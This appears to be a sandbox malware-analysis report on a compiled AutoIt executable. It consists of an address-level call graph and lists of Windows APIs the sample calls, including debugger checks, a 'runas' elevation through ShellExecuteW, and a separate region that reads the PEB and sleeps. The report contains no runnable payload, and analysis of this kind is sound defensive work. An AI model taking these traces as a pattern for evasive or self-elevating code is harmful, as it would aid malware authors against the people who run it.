349b32 102856->102853 102858 349b38 102856->102858 102857 349b58 102857->102809 102941 349a33 58 API calls 4 library calls 102858->102941 102860 349b40 GetCurrentThreadId 102860->102809 102862 34d5de __write 102861->102862 102863 349c0b __lock 58 API calls 102862->102863 102864 34d5e5 102863->102864 102865 3487d5 __calloc_crt 58 API calls 102864->102865 102866 34d5f6 102865->102866 102867 34d661 GetStartupInfoW 102866->102867 102868 34d601 __write @_EH4_CallFilterFunc@8 102866->102868 102874 34d676 102867->102874 102875 34d7a5 102867->102875 102868->102813 102869 34d86d 102956 34d87d LeaveCriticalSection _doexit 102869->102956 102871 3487d5 __calloc_crt 58 API calls 102871->102874 102872 34d7f2 GetStdHandle 102872->102875 102873 34d805 GetFileType 102873->102875 102874->102871 102874->102875 102876 34d6c4 102874->102876 102875->102869 102875->102872 102875->102873 102955 349e2b InitializeCriticalSectionAndSpinCount 102875->102955 102876->102875 102877 34d6f8 GetFileType 102876->102877 102954 349e2b InitializeCriticalSectionAndSpinCount 102876->102954 102877->102876 102881 354f34 102880->102881 102882 347d06 102880->102882 102957 34881d 58 API calls __malloc_crt 102881->102957 102886 354b1b GetModuleFileNameW 102882->102886 102884 354f5a _memmove 102885 354f70 FreeEnvironmentStringsW 102884->102885 102885->102882 102887 354b4f _wparse_cmdline 102886->102887 102889 354b8f _wparse_cmdline 102887->102889 102958 34881d 58 API calls __malloc_crt 102887->102958 102889->102820 102891 354d69 102890->102891 102892 354d71 __wsetenvp 102890->102892 102891->102824 102893 3487d5 __calloc_crt 58 API calls 102892->102893 102900 354d9a __wsetenvp 102893->102900 102894 354df1 102895 342d55 _free 58 API calls 102894->102895 102895->102891 102896 3487d5 __calloc_crt 58 API calls 102896->102900 102897 354e16 102898 342d55 _free 58 API calls 102897->102898 102898->102891 102900->102891 102900->102894 102900->102896 102900->102897 102901 354e2d 102900->102901 102959 354607 58 API calls __write 102900->102959 102960 348dc6 IsProcessorFeaturePresent 102901->102960 102903 354e39 102903->102824 102905 3430fb __IsNonwritableInCurrentImage 102904->102905 102975 34a4d1 102905->102975 102907 343119 __initterm_e 102908 342d40 __cinit 67 API calls 102907->102908 102909 343138 __cinit __IsNonwritableInCurrentImage 102907->102909 102908->102909 102909->102828 102911 3247ea 102910->102911 102921 324889 102910->102921 102912 324824 IsThemeActive 102911->102912 102978 34336c 102912->102978 102916 324850 102990 3248fd SystemParametersInfoW SystemParametersInfoW 102916->102990 102918 32485c 102991 323b3a 102918->102991 102920 324864 SystemParametersInfoW 102920->102921 102921->102832 102922->102806 102923->102810 102924->102817 102928->102833 102929->102836 102930->102842 102931->102844 102932->102848 102933->102849 102935 3487dc 102934->102935 102937 348817 102935->102937 102939 3487fa 102935->102939 102943 3551f6 102935->102943 102937->102853 102940 349de6 TlsSetValue 102937->102940 102939->102935 102939->102937 102951 34a132 Sleep 102939->102951 102940->102856 102941->102860 102942->102857 102944 355201 102943->102944 102950 35521c 102943->102950 102945 35520d 102944->102945 102944->102950 102952 348b28 58 API calls __getptd_noexit 102945->102952 102947 35522c HeapAlloc 102948 355212 102947->102948 102947->102950 102948->102935 102950->102947 102950->102948 102953 3433a1 DecodePointer 102950->102953 102951->102939 102952->102948 102953->102950 102954->102876 102955->102875 102956->102868 102957->102884 102958->102889 102959->102900 102961 348dd1 102960->102961 102966 348c59 102961->102966 102965 348dec 102965->102903 102967 348c73 _memset __call_reportfault 102966->102967 102968 348c93 IsDebuggerPresent 102967->102968 102974 34a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 102968->102974 102970 34c5f6 __wtof_l 6 API calls 102971 348d7a 102970->102971 102973 34a140 GetCurrentProcess TerminateProcess 102971->102973 102972 348d57 __call_reportfault 102972->102970 102973->102965 102974->102972 102976 34a4d4 EncodePointer 102975->102976 102976->102976 102977 34a4ee 102976->102977 102977->102907 102979 349c0b __lock 58 API calls 102978->102979 102980 343377 DecodePointer EncodePointer 102979->102980 103043 349d75 LeaveCriticalSection 102980->103043 102982 324849 102983 3433d4 102982->102983 102984 3433de 102983->102984 102985 3433f8 102983->102985 102984->102985 103044 348b28 58 API calls __getptd_noexit 102984->103044 102985->102916 102987 3433e8 103045 348db6 9 API calls __write 102987->103045 102989 3433f3 102989->102916 102990->102918 102992 323b47 __ftell_nolock 102991->102992 102993 327667 59 API calls 102992->102993 102994 323b51 GetCurrentDirectoryW 102993->102994 103046 323766 102994->103046 102996 323b7a IsDebuggerPresent 102997 35d272 MessageBoxA 102996->102997 102998 323b88 102996->102998 102999 35d28c 102997->102999 102998->102999 103000 323ba5 102998->103000 103033 323c61 102998->103033 103168 327213 59 API calls Mailbox 102999->103168 103127 327285 103000->103127 103001 323c68 SetCurrentDirectoryW 103004 323c75 Mailbox 103001->103004 103004->102920 103005 35d29c 103010 35d2b2 SetCurrentDirectoryW 103005->103010 103010->103004 103033->103001 103043->102982 103044->102987 103045->102989 103047 327667 59 API calls 103046->103047 103048 32377c 103047->103048 103177 323d31 103048->103177 103050 32379a 103051 324706 61 API calls 103050->103051 103052 3237ae 103051->103052 103053 327de1 59 API calls 103052->103053 103054 3237bb 103053->103054 103055 324ddd 136 API calls 103054->103055 103056 3237d4 103055->103056 103057 35d173 103056->103057 103058 3237dc Mailbox 103056->103058 103219 38955b 103057->103219 103062 328047 59 API calls 103058->103062 103061 35d192 103064 342d55 _free 58 API calls 103061->103064 103065 3237ef 103062->103065 103063 324e4a 84 API calls 103063->103061 103066 35d19f 103064->103066 103191 32928a 103065->103191 103068 324e4a 84 API calls 103066->103068 103070 35d1a8 103068->103070 103074 323ed0 59 API calls 103070->103074 103071 327de1 59 API calls 103072 323808 103071->103072 103073 3284c0 69 API calls 103072->103073 103075 32381a Mailbox 103073->103075 103076 35d1c3 103074->103076 103077 327de1 59 API calls 103075->103077 103079 323ed0 59 API calls 103076->103079 103078 323840 103077->103078 103081 3284c0 69 API calls 103078->103081 103080 35d1df 103079->103080 103082 324706 61 API calls 103080->103082 103084 32384f Mailbox 103081->103084 103083 35d204 103082->103083 103085 323ed0 59 API calls 103083->103085 103087 327667 59 API calls 103084->103087 103086 35d210 103085->103086 103088 328047 59 API calls 103086->103088 103089 32386d 103087->103089 103090 35d21e 103088->103090 103194 323ed0 103089->103194 103092 323ed0 59 API calls 103090->103092 103094 35d22d 103092->103094 103101 328047 59 API calls 103094->103101 103096 323887 103096->103070 103097 323891 103096->103097 103098 342efd _W_store_winword 60 API calls 103097->103098 103099 32389c 103098->103099 103099->103076 103100 3238a6 103099->103100 103103 342efd _W_store_winword 60 API calls 103100->103103 103102 35d24f 103101->103102 103104 323ed0 59 API calls 103102->103104 103105 3238b1 103103->103105 103106 35d25c 103104->103106 103105->103080 103107 3238bb 103105->103107 103106->103106 103108 342efd _W_store_winword 60 API calls 103107->103108 103109 3238c6 103108->103109 103109->103094 103110 323907 103109->103110 103112 323ed0 59 API calls 103109->103112 103110->103094 103111 323914 103110->103111 103113 3292ce 59 API calls 103111->103113 103114 3238ea 103112->103114 103115 323924 103113->103115 103116 328047 59 API calls 103114->103116 103117 329050 59 API calls 103115->103117 103118 3238f8 103116->103118 103119 323932 103117->103119 103120 323ed0 59 API calls 103118->103120 103210 328ee0 103119->103210 103120->103110 103122 32928a 59 API calls 103124 32394f 103122->103124 103123 328ee0 60 API calls 103123->103124 103124->103122 103124->103123 103125 323ed0 59 API calls 103124->103125 103126 323995 Mailbox 103124->103126 103125->103124 103126->102996 103128 327292 __ftell_nolock 103127->103128 103129 35ea22 _memset 103128->103129 103130 3272ab 103128->103130 103133 35ea3e GetOpenFileNameW 103129->103133 103264 324750 103130->103264 103135 35ea8d 103133->103135 103137 327bcc 59 API calls 103135->103137 103139 35eaa2 103137->103139 103139->103139 103140 3272c9 103292 32686a 103140->103292 103168->103005 103178 323d3e __ftell_nolock 103177->103178 103179 327bcc 59 API calls 103178->103179 103185 323ea4 Mailbox 103178->103185 103181 323d70 103179->103181 103180 3279f2 59 API calls 103180->103181 103181->103180 103190 323da6 Mailbox 103181->103190 103182 3279f2 59 API calls 103182->103190 103183 323e77 103184 327de1 59 API calls 103183->103184 103183->103185 103187 323e98 103184->103187 103185->103050 103186 327de1 59 API calls 103186->103190 103188 323f74 59 API calls 103187->103188 103188->103185 103190->103182 103190->103183 103190->103185 103190->103186 103254 323f74 103190->103254 103192 340db6 Mailbox 59 API calls 103191->103192 103193 3237fb 103192->103193 103193->103071 103195 323ef3 103194->103195 103196 323eda 103194->103196 103197 327bcc 59 API calls 103195->103197 103198 328047 59 API calls 103196->103198 103199 323879 103197->103199 103198->103199 103200 342efd 103199->103200 103201 342f7e 103200->103201 103202 342f09 103200->103202 103262 342f90 60 API calls 3 library calls 103201->103262 103208 342f2e 103202->103208 103260 348b28 58 API calls __getptd_noexit 103202->103260 103205 342f8b 103205->103096 103206 342f15 103261 348db6 9 API calls __write 103206->103261 103208->103096 103209 342f20 103209->103096 103211 35f17c 103210->103211 103216 328ef7 103210->103216 103211->103216 103263 328bdb 59 API calls Mailbox 103211->103263 103213 329040 103215 329d3c 60 API calls 103213->103215 103214 328ff8 103217 340db6 Mailbox 59 API calls 103214->103217 103218 328fff 103215->103218 103216->103213 103216->103214 103216->103218 103217->103218 103218->103124 103220 324ee5 85 API calls 103219->103220 103221 3895ca 103220->103221 103222 389734 96 API calls 103221->103222 103223 3895dc 103222->103223 103224 324f0b 74 API calls 103223->103224 103251 35d186 103223->103251 103225 3895f7 103224->103225 103226 324f0b 74 API calls 103225->103226 103227 389607 103226->103227 103228 324f0b 74 API calls 103227->103228 103229 389622 103228->103229 103230 324f0b 74 API calls 103229->103230 103231 38963d 103230->103231 103232 324ee5 85 API calls 103231->103232 103233 389654 103232->103233 103234 34571c __malloc_crt 58 API calls 103233->103234 103235 38965b 103234->103235 103236 34571c __malloc_crt 58 API calls 103235->103236 103237 389665 103236->103237 103238 324f0b 74 API calls 103237->103238 103239 389679 103238->103239 103240 389109 GetSystemTimeAsFileTime 103239->103240 103241 38968c 103240->103241 103242 3896a1 103241->103242 103243 3896b6 103241->103243 103244 342d55 _free 58 API calls 103242->103244 103245 38971b 103243->103245 103246 3896bc 103243->103246 103249 3896a7 103244->103249 103248 342d55 _free 58 API calls 103245->103248 103247 388b06 116 API calls 103246->103247 103250 389713 103247->103250 103248->103251 103252 342d55 _free 58 API calls 103249->103252 103253 342d55 _free 58 API calls 103250->103253 103251->103061 103251->103063 103252->103251 103253->103251 103255 323f82 103254->103255 103259 323fa4 _memmove 103254->103259 103258 340db6 Mailbox 59 API calls 103255->103258 103256 340db6 Mailbox 59 API calls 103257 323fb8 103256->103257 103257->103190 103258->103259 103259->103256 103260->103206 103261->103209 103262->103205 103263->103216 103326 351940 103264->103326 103267 324799 103270 327d8c 59 API calls 103267->103270 103268 32477c 103269 327bcc 59 API calls 103268->103269 103271 324788 103269->103271 103270->103271 103328 327726 103271->103328 103274 340791 103275 351940 __ftell_nolock 103274->103275 103276 34079e GetLongPathNameW 103275->103276 103277 327bcc 59 API calls 103276->103277 103278 3272bd 103277->103278 103279 32700b 103278->103279 103280 327667 59 API calls 103279->103280 103281 32701d 103280->103281 103282 324750 60 API calls 103281->103282 103283 327028 103282->103283 103284 35e885 103283->103284 103285 327033 103283->103285 103290 35e89f 103284->103290 103338 327908 61 API calls 103284->103338 103286 323f74 59 API calls 103285->103286 103288 32703f 103286->103288 103332 3234c2 103288->103332 103291 327052 Mailbox 103291->103140 103293 324ddd 136 API calls 103292->103293 103294 32688f 103293->103294 103295 35e031 103294->103295 103297 324ddd 136 API calls 103294->103297 103296 38955b 122 API calls 103295->103296 103298 35e046 103296->103298 103299 3268a3 103297->103299 103301 35e067 103298->103301 103302 35e04a 103298->103302 103299->103295 103300 3268ab 103299->103300 103303 3268b7 103300->103303 103304 35e052 103300->103304 103306 340db6 Mailbox 59 API calls 103301->103306 103305 324e4a 84 API calls 103302->103305 103339 326a8c 103303->103339 103432 3842f8 90 API calls _wprintf 103304->103432 103305->103304 103311 35e0ac Mailbox 103306->103311 103310 35e060 103310->103301 103312 35e260 103311->103312 103320 35e271 103311->103320 103323 327de1 59 API calls 103311->103323 103433 37f73d 59 API calls 2 library calls 103311->103433 103434 37f65e 61 API calls 2 library calls 103311->103434 103435 38737f 59 API calls Mailbox 103311->103435 103436 32750f 59 API calls 2 library calls 103311->103436 103437 32735d 59 API calls Mailbox 103311->103437 103313 342d55 _free 58 API calls 103312->103313 103319 342d55 _free 58 API calls 103319->103320 103320->103319 103323->103311 103327 32475d GetFullPathNameW 103326->103327 103327->103267 103327->103268 103329 327734 103328->103329 103330 327d2c 59 API calls 103329->103330 103331 324794 103330->103331 103331->103274 103334 3234d4 103332->103334 103337 3234f3 _memmove 103332->103337 103333 340db6 Mailbox 59 API calls 103335 32350a 103333->103335 103336 340db6 Mailbox 59 API calls 103334->103336 103335->103291 103336->103337 103337->103333 103338->103284 103340 326ab5 103339->103340 103341 35e41e 103339->103341 103444 3257a6 60 API calls Mailbox 103340->103444 103460 37f7a1 89 API calls 4 library calls 103341->103460 103344 35e431 103345 326ad7 103432->103310 103433->103311 103434->103311 103435->103311 103436->103311 103437->103311 103444->103345 103460->103344 103492 1239970 103506 12375c0 103492->103506 103494 1239a30 103509 1239860 103494->103509 103512 123aa60 GetPEB 103506->103512 103508 1237c4b 103508->103494 103510 1239869 Sleep 103509->103510 103511 1239877 103510->103511 103513 123aa8a 103512->103513 103513->103508 103514 321016 103519 324974 103514->103519 103517 342d40 __cinit 67 API calls 103518 321025 103517->103518 103520 340db6 Mailbox 59 API calls 103519->103520 103521 32497c 103520->103521 103522 32101b 103521->103522 103526 324936 103521->103526 103522->103517 103527 324951 103526->103527 103528 32493f 103526->103528 103530 3249a0 103527->103530 103529 342d40 __cinit 67 API calls 103528->103529 103529->103527 103531 327667 59 API calls 103530->103531 103532 3249b8 GetVersionExW 103531->103532 103533 327bcc 59 API calls 103532->103533 103534 3249fb 103533->103534 103535 327d2c 59 API calls 103534->103535 103540 324a28 103534->103540 103536 324a1c 103535->103536 103537 327726 59 API calls 103536->103537 103537->103540 103538 324a93 GetCurrentProcess IsWow64Process 103539 324aac 103538->103539 103542 324ac2 103539->103542 103543 324b2b GetSystemInfo 103539->103543 103540->103538 103541 35d864 103540->103541 103554 324b37 103542->103554 103544 324af8 103543->103544 103544->103522 103547 324ad4 103549 324b37 2 API calls 103547->103549 103548 324b1f GetSystemInfo 103550 324ae9 103548->103550 103553 324adc GetNativeSystemInfo 103549->103553 103550->103544 103551 324aef FreeLibrary 103550->103551 103551->103544 103553->103550 103555 324ad0 103554->103555 103556 324b40 LoadLibraryA 103554->103556 103555->103547 103555->103548 103556->103555 103557 324b51 GetProcAddress 103556->103557 103557->103555 103558 321066 103563 32f76f 103558->103563 103560 32106c 103561 342d40 __cinit 67 API calls 103560->103561 103562 321076 103561->103562 103564 32f790 103563->103564 103596 33ff03 103564->103596 103568 32f7d7 103569 327667 59 API calls 103568->103569 103570 32f7e1 103569->103570 103571 327667 59 API calls 103570->103571 103572 32f7eb 103571->103572 103573 327667 59 API calls 103572->103573 103574 32f7f5 103573->103574 103575 327667 59 API calls 103574->103575 103576 32f833 103575->103576 103577 327667 59 API calls 103576->103577 103578 32f8fe 103577->103578 103606 335f87 103578->103606 103582 32f930 103583 327667 59 API calls 103582->103583 103584 32f93a 103583->103584 103634 33fd9e 103584->103634 103586 32f981 103587 32f991 GetStdHandle 103586->103587 103588 3645ab 103587->103588 103589 32f9dd 103587->103589 103588->103589 103591 3645b4 103588->103591 103590 32f9e5 OleInitialize 103589->103590 103590->103560 103641 386b38 64 API calls Mailbox 103591->103641 103593 3645bb 103642 387207 CreateThread 103593->103642 103595 3645c7 CloseHandle 103595->103590 103643 33ffdc 103596->103643 103599 33ffdc 59 API calls 103600 33ff45 103599->103600 103601 327667 59 API calls 103600->103601 103602 33ff51 103601->103602 103603 327bcc 59 API calls 103602->103603 103604 32f796 103603->103604 103605 340162 6 API calls 103604->103605 103605->103568 103607 327667 59 API calls 103606->103607 103608 335f97 103607->103608 103609 327667 59 API calls 103608->103609 103610 335f9f 103609->103610 103650 335a9d 103610->103650 103613 335a9d 59 API calls 103614 335faf 103613->103614 103615 327667 59 API calls 103614->103615 103616 335fba 103615->103616 103617 340db6 Mailbox 59 API calls 103616->103617 103618 32f908 103617->103618 103619 3360f9 103618->103619 103620 336107 103619->103620 103621 327667 59 API calls 103620->103621 103622 336112 103621->103622 103623 327667 59 API calls 103622->103623 103624 33611d 103623->103624 103625 327667 59 API calls 103624->103625 103626 336128 103625->103626 103627 327667 59 API calls 103626->103627 103628 336133 103627->103628 103629 335a9d 59 API calls 103628->103629 103630 33613e 103629->103630 103631 340db6 Mailbox 59 API calls 103630->103631 103632 336145 RegisterWindowMessageW 103631->103632 103632->103582 103635 37576f 103634->103635 103636 33fdae 103634->103636 103653 389ae7 60 API calls 103635->103653 103638 340db6 Mailbox 59 API calls 103636->103638 103640 33fdb6 103638->103640 103639 37577a 103640->103586 103641->103593 103642->103595 103654 3871ed 65 API calls 103642->103654 103644 327667 59 API calls 103643->103644 103645 33ffe7 103644->103645 103646 327667 59 API calls 103645->103646 103647 33ffef 103646->103647 103648 327667 59 API calls 103647->103648 103649 33ff3b 103648->103649 103649->103599 103651 327667 59 API calls 103650->103651 103652 335aa5 103651->103652 103652->103613 103653->103639 103655 321055 103660 322649 103655->103660 103658 342d40 __cinit 67 API calls 103659 321064 103658->103659 103661 327667 59 API calls 103660->103661 103662 3226b7 103661->103662 103667 323582 103662->103667 103665 322754 103666 32105a 103665->103666 103670 323416 59 API calls 2 library calls 103665->103670 103666->103658 103671 3235b0 103667->103671 103670->103665 103672 3235a1 103671->103672 103673 3235bd 103671->103673 103672->103665 103673->103672 103674 3235c4 RegOpenKeyExW 103673->103674 103674->103672 103675 3235de RegQueryValueExW 103674->103675 103676 323614 RegCloseKey 103675->103676 103677 3235ff 103675->103677 103676->103672 103677->103676 103678 36416f 103682 375fe6 103678->103682 103680 36417a 103681 375fe6 85 API calls 103680->103681 103681->103680 103683 376020 103682->103683 103687 375ff3 103682->103687 103683->103680 103684 376022 103694 329328 84 API calls Mailbox 103684->103694 103686 376027 103688 329837 84 API calls 103686->103688 103687->103683 103687->103684 103687->103686 103691 37601a 103687->103691 103689 37602e 103688->103689 103690 327b2e 59 API calls 103689->103690 103690->103683 103693 3295a0 59 API calls _wcsstr 103691->103693 103693->103683 103694->103686 103695 35fdfc 103729 32ab30 Mailbox _memmove 103695->103729 103698 329c90 Mailbox 59 API calls 103698->103729 103699 340db6 59 API calls Mailbox 103699->103729 103701 32b525 103755 389e4a 89 API calls 4 library calls 103701->103755 103703 340db6 59 API calls Mailbox 103720 329f37 Mailbox 103703->103720 103704 360055 103754 389e4a 89 API calls 4 library calls 103704->103754 103708 32b475 103711 328047 59 API calls 103708->103711 103709 360064 103723 32a057 103711->103723 103713 32b47a 103713->103704 103724 3609e5 103713->103724 103714 327667 59 API calls 103714->103720 103715 328047 59 API calls 103715->103720 103717 376e8f 59 API calls 103717->103720 103718 342d40 67 API calls __cinit 103718->103720 103719 327de1 59 API calls 103719->103729 103720->103703 103720->103704 103720->103708 103720->103713 103720->103714 103720->103715 103720->103717 103720->103718 103721 3609d6 103720->103721 103720->103723 103725 32a55a 103720->103725 103746 32c8c0 341 API calls 2 library calls 103720->103746 103747 32b900 60 API calls Mailbox 103720->103747 103759 389e4a 89 API calls 4 library calls 103721->103759 103760 389e4a 89 API calls 4 library calls 103724->103760 103758 389e4a 89 API calls 4 library calls 103725->103758 103728 32b2b6 103748 32f6a3 341 API calls 103728->103748 103729->103698 103729->103699 103729->103701 103729->103719 103729->103720 103729->103723 103729->103728 103731 329ea0 341 API calls 103729->103731 103732 36086a 103729->103732 103734 360878 103729->103734 103736 36085c 103729->103736 103737 32b21c 103729->103737 103740 376e8f 59 API calls 103729->103740 103743 39df23 103729->103743 103749 39c193 85 API calls 2 library calls 103729->103749 103750 39c2e0 96 API calls Mailbox 103729->103750 103751 387956 59 API calls Mailbox 103729->103751 103752 39bc6b 341 API calls Mailbox 103729->103752 103753 37617e 59 API calls Mailbox 103729->103753 103731->103729 103733 329c90 Mailbox 59 API calls 103732->103733 103733->103736 103757 389e4a 89 API calls 4 library calls 103734->103757 103736->103723 103756 37617e 59 API calls Mailbox 103736->103756 103738 329d3c 60 API calls 103737->103738 103739 32b22d 103738->103739 103741 329d3c 60 API calls 103739->103741 103740->103729 103741->103728 103744 39cadd 130 API calls 103743->103744 103745 39df33 103744->103745 103745->103729 103746->103720 103747->103720 103748->103701 103749->103729 103750->103729 103751->103729 103752->103729 103753->103729 103754->103709 103755->103736 103756->103723 103757->103736 103758->103723 103759->103724 103760->103723 103761 32107d 103766 32708b 103761->103766 103763 32108c 103764 342d40 __cinit 67 API calls 103763->103764 103765 321096 103764->103765 103767 32709b __ftell_nolock 103766->103767 103768 327667 59 API calls 103767->103768 103769 327151 103768->103769 103770 324706 61 API calls 103769->103770 103771 32715a 103770->103771 103797 34050b 103771->103797 103774 327cab 59 API calls 103775 327173 103774->103775 103776 323f74 59 API calls 103775->103776 103777 327182 103776->103777 103778 327667 59 API calls 103777->103778 103779 32718b 103778->103779 103780 327d8c 59 API calls 103779->103780 103781 327194 RegOpenKeyExW 103780->103781 103782 35e8b1 RegQueryValueExW 103781->103782 103786 3271b6 Mailbox 103781->103786 103783 35e943 RegCloseKey 103782->103783 103784 35e8ce 103782->103784 103783->103786 103796 35e955 _wcscat Mailbox __wsetenvp 103783->103796 103785 340db6 Mailbox 59 API calls 103784->103785 103787 35e8e7 103785->103787 103786->103763 103788 32522e 59 API calls 103787->103788 103789 35e8f2 RegQueryValueExW 103788->103789 103791 35e90f 103789->103791 103793 35e929 103789->103793 103790 3279f2 59 API calls 103790->103796 103792 327bcc 59 API calls 103791->103792 103792->103793 103793->103783 103794 327de1 59 API calls 103794->103796 103795 323f74 59 API calls 103795->103796 103796->103786 103796->103790 103796->103794 103796->103795 103798 351940 __ftell_nolock 103797->103798 103799 340518 GetFullPathNameW 103798->103799 103800 34053a 103799->103800 103801 327bcc 59 API calls 103800->103801 103802 327165 103801->103802 103802->103774

                                                                                                                    Executed Functions

                                                                                                                    Function 00323B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00323B68
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00323B7A
                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,003E52F8,003E52E0,?,?), ref: 00323BEB
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                      • Part of subcall function 0033092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00323C14,003E52F8,?,?,?), ref: 0033096E
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00323C6F
                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003D7770,00000010), ref: 0035D281
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,003E52F8,?,?,?), ref: 0035D2B9
                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003D4260,003E52F8,?,?,?), ref: 0035D33F
                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0035D346
                                                                                                                      • Part of subcall function 00323A46: GetSysColorBrush.USER32(0000000F), ref: 00323A50
                                                                                                                      • Part of subcall function 00323A46: LoadCursorW.USER32(00000000,00007F00), ref: 00323A5F
                                                                                                                      • Part of subcall function 00323A46: LoadIconW.USER32(00000063), ref: 00323A76
                                                                                                                      • Part of subcall function 00323A46: LoadIconW.USER32(000000A4), ref: 00323A88
                                                                                                                      • Part of subcall function 00323A46: LoadIconW.USER32(000000A2), ref: 00323A9A
                                                                                                                      • Part of subcall function 00323A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00323AC0
                                                                                                                      • Part of subcall function 00323A46: RegisterClassExW.USER32(?), ref: 00323B16
                                                                                                                      • Part of subcall function 003239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00323A03
                                                                                                                      • Part of subcall function 003239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00323A24
                                                                                                                      • Part of subcall function 003239D5: ShowWindow.USER32(00000000,?,?), ref: 00323A38
                                                                                                                      • Part of subcall function 003239D5: ShowWindow.USER32(00000000,?,?), ref: 00323A41
                                                                                                                      • Part of subcall function 0032434A: _memset.LIBCMT ref: 00324370
                                                                                                                      • Part of subcall function 0032434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00324415
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%;
                                                                                                                    • API String ID: 529118366-424290769
                                                                                                                    • Opcode ID: 1136eef20ab8e07f18c89b32f90e50f9feb76e0db2164cdad06865351c0483d1
                                                                                                                    • Instruction ID: d6062b1de3144d38e0e69a2611aa119544c54c520a63f4b350a47aaf86beaa08
                                                                                                                    • Opcode Fuzzy Hash: 1136eef20ab8e07f18c89b32f90e50f9feb76e0db2164cdad06865351c0483d1
                                                                                                                    • Instruction Fuzzy Hash: 4B510535D082A8AECF23EBB4FC45EED7B7CAB45744F004A65F511BA2E1DA744605CB20
                                                                                                                    Function 003249A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1037 3249a0-324a00 call 327667 GetVersionExW call 327bcc 1042 324a06 1037->1042 1043 324b0b-324b0d 1037->1043 1045 324a09-324a0e 1042->1045 1044 35d767-35d773 1043->1044 1046 35d774-35d778 1044->1046 1047 324b12-324b13 1045->1047 1048 324a14 1045->1048 1050 35d77b-35d787 1046->1050 1051 35d77a 1046->1051 1049 324a15-324a4c call 327d2c call 327726 1047->1049 1048->1049 1059 324a52-324a53 1049->1059 1060 35d864-35d867 1049->1060 1050->1046 1053 35d789-35d78e 1050->1053 1051->1050 1053->1045 1055 35d794-35d79b 1053->1055 1055->1044 1057 35d79d 1055->1057 1061 35d7a2-35d7a5 1057->1061 1059->1061 1062 324a59-324a64 1059->1062 1063 35d880-35d884 1060->1063 1064 35d869 1060->1064 1065 324a93-324aaa GetCurrentProcess IsWow64Process 1061->1065 1066 35d7ab-35d7c9 1061->1066 1067 324a6a-324a6c 1062->1067 1068 35d7ea-35d7f0 1062->1068 1071 35d886-35d88f 1063->1071 1072 35d86f-35d878 1063->1072 1069 35d86c 1064->1069 1073 324aaf-324ac0 1065->1073 1074 324aac 1065->1074 1066->1065 1070 35d7cf-35d7d5 1066->1070 1075 35d805-35d811 1067->1075 1076 324a72-324a75 1067->1076 1079 35d7f2-35d7f5 1068->1079 1080 35d7fa-35d800 1068->1080 1069->1072 1077 35d7d7-35d7da 1070->1077 1078 35d7df-35d7e5 1070->1078 1071->1069 1081 35d891-35d894 1071->1081 1072->1063 1082 324ac2-324ad2 call 324b37 1073->1082 1083 324b2b-324b35 GetSystemInfo 1073->1083 1074->1073 1087 35d813-35d816 1075->1087 1088 35d81b-35d821 1075->1088 1084 35d831-35d834 1076->1084 1085 324a7b-324a8a 1076->1085 1077->1065 1078->1065 1079->1065 1080->1065 1081->1072 1096 324ad4-324ae1 call 324b37 1082->1096 1097 324b1f-324b29 GetSystemInfo 1082->1097 1086 324af8-324b08 1083->1086 1084->1065 1090 35d83a-35d84f 1084->1090 1091 324a90 1085->1091 1092 35d826-35d82c 1085->1092 1087->1065 1088->1065 1094 35d851-35d854 1090->1094 1095 35d859-35d85f 1090->1095 1091->1065 1092->1065 1094->1065 1095->1065 1102 324ae3-324ae7 GetNativeSystemInfo 1096->1102 1103 324b18-324b1d 1096->1103 1099 324ae9-324aed 1097->1099 1099->1086 1101 324aef-324af2 FreeLibrary 1099->1101 1101->1086 1102->1099 1103->1102
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 003249CD
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • GetCurrentProcess.KERNEL32(?,003AFAEC,00000000,00000000,?), ref: 00324A9A
                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00324AA1
